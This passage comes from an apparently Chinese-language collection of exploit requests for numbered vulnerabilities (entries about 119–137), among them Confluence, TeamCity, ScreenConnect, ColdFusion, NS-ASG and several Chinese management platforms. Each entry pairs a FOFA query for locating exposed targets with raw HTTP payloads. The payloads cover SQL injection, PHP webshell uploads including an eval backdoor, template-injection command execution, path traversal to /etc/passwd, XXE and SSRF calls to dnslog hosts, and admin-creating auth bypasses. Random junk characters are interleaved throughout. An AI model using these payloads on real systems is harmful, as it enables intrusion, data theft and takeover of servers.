/ l8 y  }. _& v3 |3 z( v8 }, oPOST /sysmanage/sysmanageajax.php HTTP/1.112 e+ B4 _) c3 P, ^; F
Host: x.x.x.x
# z4 t5 E- w$ Z" Y% I7 jCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
/ |- J0 T# J& b& B8 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.08 H4 {! |) w% c7 I1 D
Accept: */*
$ E2 _+ h9 B+ A9 d+ NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ y/ U0 l5 g  p6 O7 A9 }7 \Accept-Encoding: gzip, deflate
. g! T0 y# F2 H" @* CContent-Type: application/x-www-form-urlencoded;
6 a* x5 ?! ]/ g5 D) z: Q1 q% GContent-Length: 109
+ g! @4 F5 b2 W' ^; {  YOrigin: https://58.18.133.60:84436 c. S8 d& N, D  C  }0 s' G
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php# U$ \# F$ o- K* ]5 a& c
Sec-Fetch-Dest: empty
) r1 Y+ ~4 e  C7 [) C/ zSec-Fetch-Mode: cors
7 u' Y& q! u- `* t& G0 X$ GSec-Fetch-Site: same-origin
5 }6 @: P4 p4 x9 Q6 z1 u3 uX-Forwarded-For: 1.1.1.1" C8 u4 s6 X. u" D9 z, q  ?) X
X-Originating-Ip: 1.1.1.1) u- {0 a3 s  `4 q/ h) g* a' r
X-Remote-Ip: 1.1.1.1
0 g/ {5 u/ F% w, {5 u! |X-Remote-Addr: 1.1.1.1
+ d0 X: r6 i; [1 ?6 Y* c$ {- X! f6 RTe: trailers  u# P3 n# N5 `! H
Connection: close- M5 A, n4 T8 u

% S$ _) ^. Z. q# a' isrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
1 Q$ I" Q5 v: Y9 Q  E
' Y# Y, t* g5 x$ O  s
, y' e( p- Q; m! K, A/ m6 P6 A; f120. 北京百绰智能S40管理平台导入web.php任意文件上传
% c4 S9 C6 y6 OCVE-2024-1253
8 \  D+ N# V6 V: wFOFA:title="Smart管理平台"
$ q6 {0 D$ I/ ?# O$ YPOST /useratte/web.php? HTTP/1.1; S: M/ @: t+ {
Host: ip:port
( {+ b6 p1 F6 x. `& ZCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db8 p& A* i& m2 b0 _6 h; p2 z
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko# |2 i5 D* k+ G; h0 x8 ]' ]5 ], }, M0 C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ a: d- P6 ]4 V& m+ v/ \4 H) P; j% w. u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ X5 q  O# s: \1 l) X2 n$ @1 s
Accept-Encoding: gzip, deflate
; N6 H, ^: I( _5 z$ l% H! N! _Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
" u5 f$ C( J' O2 T* mContent-Length: 597/ u. g, D9 Z+ f! W) X3 y9 C7 n
Origin: https://ip:port0 w0 X( J' v' g; `- n
Referer: https://ip:port/sysmanage/licence.php5 t& k( M" n% d/ @
Upgrade-Insecure-Requests: 1
5 t- _& E' w2 _& M% ]5 z( Y% E, @Sec-Fetch-Dest: document9 l9 L* F+ P% l- ?1 K9 I
Sec-Fetch-Mode: navigate7 o1 o' f, J  l8 {; F4 _* @
Sec-Fetch-Site: same-origin- @& o) S% ~% c: }- S9 W
Sec-Fetch-User: ?10 w* X% ~; }0 [+ J+ m( M  w: v1 B
Te: trailers( n. ]4 R, O6 A: O4 b- n4 f& _, h
Connection: close4 z1 \0 b( p8 U3 @
9 r  E3 u( T4 U% d* p
-----------------------------42328904123665875270630079328
- x3 m9 P* Z$ N. K. g$ JContent-Disposition: form-data; name="file_upload"; filename="2.php") t4 a& C, E' I5 m
Content-Type: application/octet-stream
, x4 F* t6 m6 D2 M' T& F+ t& M0 A0 o2 f0 @1 _2 p' q9 ?# I
<?php phpinfo()?>( C# J7 g' M% ~
-----------------------------423289041236658752706300793281 w, G0 {8 v" C" e
Content-Disposition: form-data; name="id_type"
9 D+ b/ x0 {. I2 r& t! g4 k1 v! ^  w& f- k( |
1
3 u( I$ ?8 P  z; I/ |) _-----------------------------42328904123665875270630079328
. c8 g* b. ]( f8 tContent-Disposition: form-data; name="1_ck"% U- M. k: Q' w% g7 `
! Y% X: U9 K8 O! M, C$ S4 t+ J! B
1_radhttp
7 i- |! r- X- l$ U% f-----------------------------423289041236658752706300793283 W5 B2 g7 T% i( e) |
Content-Disposition: form-data; name="mode"" R6 m% e! Q6 O( T8 x/ n, S
+ t4 V8 z( g8 H- d% y
import
. H: ]9 s; m% p3 p' x" u* a" z-----------------------------42328904123665875270630079328
5 X2 I$ u0 f0 m( p4 S7 D6 P/ S) \# A
: Z; Z+ b. b$ _2 k) E! Q
; i( [: W; x& B文件路径/upload/2.php
, Q2 I! t+ R6 d5 Y; C$ o& l' b- ?; c
121. 北京百绰智能S42管理平台userattestation.php任意文件上传/ y  R5 a3 z" S3 X9 {
CVE-2024-19183 ]5 t$ s" f) v
FOFA:title="Smart管理平台"
; o5 p% x) _8 w# P8 GPOST /useratte/userattestation.php HTTP/1.1
. }6 [+ p  e( j0 EHost: 192.168.40.130:8443& ^: B5 G: o( V# l* v2 N, e
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
! Z' b) u1 ?4 DUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko' F& [7 B+ V2 i6 R0 q9 o; A3 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. {8 O- ~; a* Q7 R5 m( _" Y" `9 t6 BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 z$ U. m) r$ T' @2 z9 X* [Accept-Encoding: gzip, deflate# g$ T7 L& S9 p. x- o/ r
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
! K' D/ {7 s2 d3 K3 K# dContent-Length: 592
+ \0 N# t" l/ DOrigin: https://192.168.40.130:84439 w" Q, v/ i5 H
Upgrade-Insecure-Requests: 17 ~7 o& \/ w! e1 e9 o# j0 O% m
Sec-Fetch-Dest: document9 S- L9 B6 Z6 s
Sec-Fetch-Mode: navigate
) h* U) e0 x& O% L# h2 e2 \( tSec-Fetch-Site: same-origin7 ?# s' S6 h# a" ?
Sec-Fetch-User: ?1$ G% N9 `, J& c
Te: trailers
+ M& n4 ]0 `- a$ RConnection: close
; W7 t6 q. o8 k( j) y% ?" Q$ j& I3 K
-----------------------------42328904123665875270630079328& I* v1 M8 @5 [  x6 ~1 y8 \
Content-Disposition: form-data; name="web_img"; filename="1.php"
' ?( K6 _5 w+ d2 M( J( H/ iContent-Type: application/octet-stream
5 x3 t8 P8 x% g, _3 r$ I* L1 v6 a+ ~9 q- E! I% n' X
<?php phpinfo();?>3 P9 B  y& h* r" q
-----------------------------423289041236658752706300793284 C$ n# x4 l+ S0 y
Content-Disposition: form-data; name="id_type"
  P5 W+ U$ W7 r+ }; D1 P% h1 p* U  t, Y
1& v9 p( O3 A7 V: W
-----------------------------42328904123665875270630079328* M. l( ]$ `, U/ g8 B7 b+ O1 P3 Z
Content-Disposition: form-data; name="1_ck"
( P' l! t7 X4 @( T! g/ c; q# E8 ~! S# j' `2 w# d
1_radhttp1 f% z$ N0 m  S9 G, p  C
-----------------------------42328904123665875270630079328+ g% o' l) C& j# H8 Q6 G; l
Content-Disposition: form-data; name="hidwel", h5 O. v5 O$ l0 I1 g
' T1 Z/ b8 [; p  \. ?9 e% g4 T
set
4 ~! T5 J+ o' `7 k6 E' D( {8 x-----------------------------42328904123665875270630079328% g$ o+ a8 s( L" P& x$ R5 N% h

) H0 ?- h% v. X) N" E) O2 ^
/ ^  P5 x7 {: W7 jboot/web/upload/weblogo/1.php! u4 W/ ^* {( M- H- B8 ^# K3 M
+ q4 f2 J4 s; U; V2 M
122. 北京百绰智能s200管理平台/importexport.php sql注入1 u8 N& N  k7 }# x5 j, B5 L& y
CVE-2024-27718FOFA:title="Smart管理平台"
7 Q0 Y7 k, I; u3 K/ ]其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()1 X& Z  y$ r( {" h+ q5 S
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1! [$ G3 N4 ]6 D4 Q
Host: x.x.x.x
! O2 E; l; Q# Y7 _! {Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0  E' f8 q2 v( N( k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ X3 S$ e# }2 h% JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 m$ @$ V* X; d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% H6 V" t/ x: p5 s6 v; Q0 z# J. e
Accept-Encoding: gzip, deflate, br
- i4 Z5 S) I: {2 X3 }" R: DUpgrade-Insecure-Requests: 1
/ @! F6 \5 `9 w4 x. P6 u5 P7 ?Sec-Fetch-Dest: document
2 M) P+ j) w/ BSec-Fetch-Mode: navigate1 V2 B% v2 z4 M; L1 M& d
Sec-Fetch-Site: none
# a! x9 d9 E7 ~8 D3 V# J0 D" y$ ]Sec-Fetch-User: ?1( @, N: Y! R  x% j
Te: trailers
9 ^% H8 e, G4 cConnection: close7 c* M' S# f# k1 V2 w: l9 i1 C
+ N' D* w/ B- Q% y' [% S/ S

5 c. p8 g; G! U0 F* O( K* h123. Atlassian Confluence 模板注入代码执行* O, ?3 s- T6 {: p) s( ^
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3": ?% r: h# |5 B5 o, e
POST /template/aui/text-inline.vm HTTP/1.1
) k' l3 Z  H3 g: H) ZHost: localhost:8090
# S* q/ X0 x  k" p4 b; j& k5 hAccept-Encoding: gzip, deflate, br- q) Z- R. ^0 ]
Accept: */*' ?  M' M; p/ ^. N
Accept-Language: en-US;q=0.9,en;q=0.8! X6 V& k4 y" J' O' S( f" l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
9 v6 e# r2 f7 ?" H2 zConnection: close( u/ t" g$ Z/ n' R5 J+ ~( ?) S
Content-Type: application/x-www-form-urlencoded4 Y# O& v: E/ b' ^+ z/ |+ B

( Z: O% A& h4 @, Q: b! M, F$ R, rlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
4 C. J; H# V8 b- O7 I! _3 N0 o
) f+ c# K3 S& M& t
5 z' s/ ?1 ]- B2 x& i1 h124. 湖南建研工程质量检测系统任意文件上传4 ]" t3 I+ ^: g* X, @4 V
FOFA:body="/Content/Theme/Standard/webSite/login.css"* H7 L) j: P3 T$ Z* e) m6 E
POST /Scripts/admintool?type=updatefile HTTP/1.1. B$ S3 w% o. R
Host: 192.168.40.130:82823 t$ k& l9 U; S( f( |9 F. o
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
; O, J  D3 c# @$ r! fContent-Length: 72
2 g' y9 x* V$ k  U% ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.85 A+ b8 j$ Z, x- I1 e6 [
Accept-Encoding: gzip, deflate, br4 J% b4 V' h4 ^' h0 l7 i0 h8 B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 R  X4 ~& [/ ?" L3 Q4 ]7 G+ Y) s: \Connection: close1 Q5 z& k$ y& }, n; }  e
Content-Type: application/x-www-form-urlencoded1 |# L& X8 X+ F! L: F% j. _
6 a  j1 b% s. n6 a/ y& R
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
2 V# H. J8 l: i8 f% v
9 s8 m. T! y& f! }7 M+ a9 k- h: M
5 z4 ~2 A" H$ p/ fhttp://192.168.40.130:8282/Scripts/abcgcg.aspx4 R* {1 Z9 w. u2 k2 q# g8 N1 E8 `
* o9 @% ~3 |$ R' Q6 w' E
125. ConnectWise ScreenConnect身份验证绕过
" t; s  Z+ _% \# KCVE-2024-1709: G9 f' ^7 z# g$ I
FOFA:icon_hash="-82958153"
6 ]. [9 K1 J+ f$ k1 ?* q; Phttps://github.com/watchtowrlabs ... bypass-add-user-poc
6 X1 j' M* N* y; z( o3 J' |0 @/ P. C, k2 R! z5 b  K' R' F

- a) t0 K& f* Z; V8 k9 Y使用方法* `* U/ e. H+ }. ^
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
6 W7 ]2 J3 A: ~4 Z# u2 Q4 e6 ^6 r
6 D2 h6 n; C& l4 ?; `/ j: d  u+ T" w# U. E  t% P% f: [6 o) P# O
创建好用户后直接登录后台,可以执行系统命令。2 k. t4 a7 E0 a

4 u& J' t5 d2 k3 |  k. w/ Q( a126. Aiohttp 路径遍历5 z( `2 P: X( g% _
FOFA:title=="ComfyUI"
3 d- J5 Y# L- ^/ b: \0 I3 {GET /static/../../../../../etc/passwd HTTP/1.1
) u" L- |; I; P7 I+ |3 qHost: x.x.x.x
  _3 |& I* v' fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" ~! n. ~: J0 v& U5 d
Connection: close) M" B  t& V% x& Q9 t. ]% f1 d
Accept: */*" Q1 V% o" T( c5 p% B  q- N# L
Accept-Language: en
9 X* I' _# {) C' Q* O* S* a" t: GAccept-Encoding: gzip
# ~8 H$ J. w  ]' ^4 @: @
  s8 B- C+ I+ y; ?( Y$ y, k8 l9 O
5 [8 ]- }" Q+ C  r$ u- m127. 广联达Linkworks DataExchange.ashx XXE2 r* g$ k4 i7 {
FOFA:body="Services/Identification/login.ashx" , I% t5 n8 \+ ]8 f
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.14 q9 |8 h. J8 y: ]+ Q6 e
Host: 192.168.40.130:8888
8 c6 A+ f  N) J  N6 T: BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.368 y7 a( h. C6 U1 T5 I1 \, a' c
Content-Length: 415
( |+ @3 h' Y5 j( jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- N3 {' a' c; P& i5 O8 @Accept-Encoding: gzip, deflate1 Y# z: A: M- ]8 {
Accept-Language: zh-CN,zh;q=0.91 h3 u5 N! C. d, y/ \* t. c7 Q
Connection: close
# {+ w$ [  z8 V) SContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0" {" A0 \# F8 B* W
Purpose: prefetch
* w( q( G" ]2 ]5 ^Sec-Purpose: prefetch;prerender
; s' Q8 k6 q6 I; \, ]
7 ~- H, |' D# ]8 Z! k------WebKitFormBoundaryJGgV5l5ta05yAIe0
9 g& C+ F5 z! S! M$ b" jContent-Disposition: form-data;name="SystemName"
6 f6 D3 M) t0 Q, e
3 H% C( H! [: ABIM1 U8 u! F* G# {" y$ m2 s7 ~
------WebKitFormBoundaryJGgV5l5ta05yAIe0
; `) f9 I, S: o4 T6 Q$ T/ qContent-Disposition: form-data;name="Params"
% c! z9 L6 g; p+ i4 |) SContent-Type: text/plain5 e  I' w. v- n- [4 K4 i0 H
  `, f; b' {8 E  ]! M. w4 @
<?xml version="1.0" encoding="UTF-8"?>
' v+ ?" Z4 i" \3 H. j# s<!DOCTYPE test [2 X/ Z; F* r) n. B+ d
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">5 ?0 A$ b7 W0 R, F
]' A5 C" L& J9 |9 d0 {
>
5 v8 L( a& G) {) P9 g6 M7 @<test>&t;</test>
6 g, d/ B/ W+ j9 i6 w$ P7 J------WebKitFormBoundaryJGgV5l5ta05yAIe0--- T1 y+ r  ]$ y8 r$ G/ R  _( e2 W6 \

1 y  ^7 S" C" u# r* {
* s) j3 [/ n8 R5 G9 l2 k- E3 b/ E: o2 U" s+ p4 d9 j
128. Adobe ColdFusion 反序列化
+ ~: x; P  R/ DCVE-2023-38203, m2 Q7 H/ @) A* |2 I6 l3 ~
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
  c3 f8 {( Q& g" Z0 t1 H) |" s. \# zFOFA:app="Adobe-ColdFusion"
, [( c* n7 {  A; aPAYLOAD1 X3 X; M: I' p, Y! }5 Q  j3 T; z6 R% ^% f

/ y+ {' |+ p" D; V, P/ ^4 a129. Adobe ColdFusion 任意文件读取
3 e- Z- l0 H2 T! WCVE-2024-20767
0 W# g" K9 c5 G: G; R0 S7 M- o5 JFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
; l8 D* o* k6 J  b* g第一步,获取uuid
6 Z$ I5 _4 F0 b0 I' v  b5 b6 jGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
* E/ \3 w. m- b4 T* e% qHost: x.x.x.x3 W4 t3 {, H2 J5 l. _5 W1 _: L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.360 a: h" _6 H* d2 U( r
Accept: */*
1 d9 u( z* r, a3 G' zAccept-Encoding: gzip, deflate
0 _# {! V8 C. b& I6 c8 Z2 [Connection: close
% g; V6 k/ J0 J" a2 F/ r
  h6 k$ U, j8 y% L, T. w
/ e/ U3 s: b) }: p第二步,读取/etc/passwd文件
& l' ~9 W6 n! F- u7 XGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
# F+ Z" s/ f9 F* E8 m7 FHost: x.x.x.x8 p7 }  X$ K1 w# m* v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.367 T0 n+ o/ j8 ~& F. Z1 d
Accept: */*
( k, R( _' m+ q; e! S0 XAccept-Encoding: gzip, deflate
7 P4 }, |& k2 z& _. k6 n7 x/ gConnection: close7 m7 ^* \# K5 F. m6 s) D
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
8 {$ H9 ^, i& d0 f* I4 G9 ^7 V  P' S+ y+ |5 j$ q+ f1 ~

* b# D4 W: h% _/ P& v130. Laykefu客服系统任意文件上传
2 R9 {- Z$ s* E3 R; k2 J, }FOFA:icon_hash="-334624619"4 g, P8 J# h( I% v2 c# [
POST /admin/users/upavatar.html HTTP/1.1' v: K* V2 a% I
Host: 127.0.0.18 G( A* m5 N8 e$ Q0 c" \& @: T
Accept: application/json, text/javascript, */*; q=0.01
( V' Q% h8 c, yX-Requested-With: XMLHttpRequest+ S; c$ _2 a! F" G0 q
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
5 C1 w& @  O7 R: OContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR- @, p; v# D( p
Accept-Encoding: gzip, deflate2 N8 g8 R+ t% m
Accept-Language: zh-CN,zh;q=0.9# C$ q# ?1 N( D3 y7 K$ v, Y6 G
Cookie: user_name=1; user_id=3% V0 d. K4 x1 ~8 P& o; p7 V
Connection: close  [; m' a8 X: X0 z- H& ?
3 W5 s! @& h/ `. z6 U
------WebKitFormBoundary3OCVBiwBVsNuB2kR6 f( m) v+ ~& y/ M" p8 d2 a! r
Content-Disposition: form-data; name="file"; filename="1.php"3 K* i& O2 b- T7 q$ _& s8 w; @( d
Content-Type: image/png- j; K2 n4 D' e( Y) x

; I/ l9 {% h* }/ N5 I6 j<?php phpinfo();@eval($_POST['sec']);?>+ ]7 \. P8 G: o
------WebKitFormBoundary3OCVBiwBVsNuB2kR--! l) }- Y2 p) H: K& _; G

0 I9 u; W" ?: t% X( v
5 X& F. }! |' V' x# U131. Mini-Tmall <=20231017 SQL注入
8 w+ @$ ]! o0 l2 x; f0 H' KFOFA:icon_hash="-2087517259"
2 G- `# E9 o! a+ v& ^$ T) G; B5 K后台地址:http://localhost:8080/tmall/admin* G( y8 j3 P; |. _
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)# \( l6 F- F  G6 x$ _& ?3 Y
" f; a+ V/ x: L
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
, K( N2 q9 |8 G3 i% DCVE-2024-271985 i9 u& ^$ c0 |, U2 m4 U
FOFA:body="Log in to TeamCity"- P6 f7 g% q3 }  n8 i( p
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1$ |9 g9 G+ D5 r( u. A) s5 T# q
Host: 192.168.40.130:8111
/ ~; h( }) @1 L+ ~" TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 v8 B6 z4 v/ c! t' m
Accept: */*
# `3 |7 @- t6 R( _9 _& \4 }Content-Type: application/json) e' d! l. n; i6 ^# U7 R
Accept-Encoding: gzip, deflate- M* J. }) I( ~6 T6 g7 a% C  ?( m
& b. s2 v- Y9 S- S$ n$ s/ |
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
3 G. h) ^7 o' d" B1 n3 |+ L9 q7 q6 U! ]# G+ @: `' N
, Y9 X7 F" F" A
CVE-2024-27199' ^* k# j9 o. a& A  [
/res/../admin/diagnostic.jsp, x" B- ~* L1 b$ W) T
/.well-known/acme-challenge/../../admin/diagnostic.jsp" j0 {& a! }! ~' A
/update/../admin/diagnostic.jsp
! y: O+ k6 ?$ d% q7 _  {
3 Z; Q, r* U+ f0 e) T0 M9 Q! }' J! m8 K" ~
CVE-2024-27198-RCE.py1 l* u+ u, h! q2 c
  E1 ]  V4 R1 ^& ]' h
133. H5 云商城 file.php 文件上传
8 ?- J( z, Q+ J, R! VFOFA:body="/public/qbsp.php"1 t' o( y+ W3 Y% M6 s8 J# l
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
3 e& [1 O+ C, H" O) B9 D1 `Host: your-ip+ O, ~/ u/ `9 f! G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36: f4 g- z9 t$ w) B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx2 z1 l2 T! G4 I- U& b, n
' T; f# K, j/ x) \& j5 Q
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
  v/ a$ t- b" K# p! aContent-Disposition: form-data; name="file"; filename="rce.php"
. P! L: i: \$ A- A+ |- TContent-Type: application/octet-stream
2 }, \7 Y: B8 x! x# J) s( i9 }/ D 7 x, s$ X9 a* B4 {$ Q
<?php system("cat /etc/passwd");unlink(__FILE__);?>
7 ?# ~- R3 y! u. U- w------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
1 r' ?* n$ i6 x- X! R" H" p8 C6 q0 M% j+ P, i
: X; A- z- p! o3 Y1 A2 G

8 k0 l$ p9 y& x" w: u134. 网康NS-ASG应用安全网关index.php sql注入
% o5 L" ]  M0 T2 E4 f5 V! z  lCVE-2024-2330+ N( F3 O& S( y9 o1 p
Netentsec NS-ASG Application Security Gateway 6.3版本9 ^' j0 [; C5 `* X& v
FOFA:app="网康科技-NS-ASG安全网关"
# H2 ?% T( D0 @' iPOST /protocol/index.php HTTP/1.1. h; u& V- I- f1 o6 W( ~$ q
Host: x.x.x.x& |' N7 a8 G3 w% v- `1 Q
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de1 D& c0 t/ N' R/ o. H$ x0 V* Q) m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
  P$ C, @' v: a% N: GAccept: */*
- m9 m" {  `/ E  v/ @3 v/ s. u! jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* T/ s* a! V3 z" |5 x! WAccept-Encoding: gzip, deflate0 G+ D% i  [: W, k- ^4 I
Sec-Fetch-Dest: empty
7 z' v+ |$ T6 ^& ?" L% u# jSec-Fetch-Mode: cors% d; F9 \4 t9 B' ~" b
Sec-Fetch-Site: same-origin4 ^! n2 W" ~; n
Te: trailers
2 F! t0 h% L- [  r! W% p$ {0 ^Connection: close9 l5 J, F% L, M! v0 k( O, U8 q' ~
Content-Type: application/x-www-form-urlencoded3 V  q7 W4 s9 h2 i: H0 X
Content-Length: 263
3 ]8 ~& j8 C3 E9 T
0 i3 Y$ p+ S3 a: {jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
& Y& e/ _2 l/ R& W' d2 {; U! e$ t! y9 W+ Y& y1 K' @8 v# w" {

6 t7 t/ A; T- S! p1 Y" w135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入! v  l9 x1 ?- n; y! P
CVE-2024-2022- e+ c6 t8 c1 N2 T9 E+ L
Netentsec NS-ASG Application Security Gateway 6.3版本
0 e( k' w; |5 l3 V+ o  i3 kFOFA:app="网康科技-NS-ASG安全网关"
4 Z6 }* a- V: T0 ^8 rGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1& [# ^; A( o: ^" M1 E
Host: x.x.x.x
7 ^# q7 `' h* U# w5 u2 U4 W/ d. wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 d8 g) C' Q% {8 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 ?, T3 }  b3 Q  W$ x
Accept-Encoding: gzip, deflate8 ]. [+ s$ }; F" I, @
Accept-Language: zh-CN,zh;q=0.9
' K( I' _8 u% c+ \2 RConnection: close
- n  |, K- m$ ?
9 L2 A, ]$ \& y
) u' j+ o) Q% c  I136. NextChat cors SSRF
9 b# q. v) s3 yCVE-2023-497853 m+ ^: y0 ?  X  p
FOFA:title="NextChat") j! H/ z! C" N/ g: U; P, \
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
$ A$ T6 C2 E& p% w3 @9 MHost: x.x.x.x:10000
. p" ?0 ^( ?6 [; P" m- f6 UUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 J4 f$ G- @( e# v1 ~& q5 ^
Connection: close) e& X+ k/ \. _4 q5 Y3 _
Accept: */*
  V8 s  y# ?, u7 X& ~Accept-Language: en8 _/ V% Y3 a  O) t3 b
Accept-Encoding: gzip
7 |! E& l4 r- @  A* R! M, J0 S! i2 A8 J0 G: [" z+ x5 J0 r! V$ p5 \

( [( W4 _) \' D6 I3 e3 F+ q* g137. 福建科立迅通信指挥调度平台down_file.php sql注入/ B; h/ O+ m) \0 C' D
CVE-2024-2620
4 M( {/ }0 D0 q, LFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
+ Z4 g- X- `3 F! F; GGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1! l- A+ v7 p; M" y) ^
Host: x.x.x.x
, B/ z  {" |$ Y% ]6 e7 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; \1 Y" x: C2 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 ]4 [; \$ _+ V+ h) d* C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 m  j* V! a' s! o( o( X
Accept-Encoding: gzip, deflate, br! P) @1 U4 z2 G& a5 @
Connection: close  I4 d! r) ~8 v+ ^2 c
